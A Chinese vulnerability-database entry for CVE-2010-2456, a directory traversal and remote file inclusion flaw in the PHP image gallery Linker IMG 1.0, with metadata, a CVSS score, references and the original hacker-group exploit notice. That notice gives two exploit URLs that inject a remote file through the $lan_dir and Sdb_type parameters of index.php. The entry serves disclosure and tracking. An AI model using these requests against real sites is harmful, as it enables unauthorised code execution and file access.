Codelib Linker IMG多个目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1119529 漏洞类型 路径遍历
发布时间 2010-06-21 更新时间 2010-06-29
CVE编号 CVE-2010-2456 CNNVD-ID CNNVD-201006-418
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/13964
https://cxsecurity.com/issue/WLB-2010060200
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201006-418
|漏洞详情
LinkerIMG1.0以及早期版本中存在多个目录遍历漏洞。远程攻击者可以借助参数(1)cook_lancookieparameter($lan_dirvariable)或者可能(2)Sdb_type的URL读取和执行任意的本地文件。
|漏洞EXP
1 ########################################## 1
0 I'm Sn!pEr.S!Te Hacker member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# ------------------------------------------------------------
# Remote File Inclusion Vulnerability
# -----------------------------------------------------------

Linker IMG <==1.0 (index.php)

--------------------------------------------------------------
# [+] Author : Sn!pEr.S!Te Hacker
# [+] Email : Sniper-site@HoTmaiL.Com
# [+] Inj3ct0r Team Hacker #
# [+] 21-6-2010
# [+] Script : Image Galleries » Linker IMG
# [+] Version: [1.0]
# [+] Download:http://enproject.codelib.co.kr/down/linker_IMG.zip
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
-=[ exploit ]=-

http://server/Linker IMG/index.php?$lan_dir=[RFI]


http://server/Linker IMG/index.php?Sdb_type=[RFI]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

=========================| -=[ THE END]=- |=========================
|参考资料

来源:XF
名称:linkerimg-index-file-include(59614)
链接:http://xforce.iss.net/xforce/xfdb/59614
来源:VUPEN
名称:ADV-2010-1562
链接:http://www.vupen.com/english/advisories/2010/1562
来源:EXPLOIT-DB
名称:13964
链接:http://www.exploit-db.com/exploits/13964
来源:VIM
名称:20100625somediscrepancies:LinkerIMG<=1.0RFI
链接:http://www.attrition.org/pipermail/vim/2010-June/002354.html
来源:MISC
链接:http://packetstormsecurity.org/1006-exploits/linkerimg-rfi.txt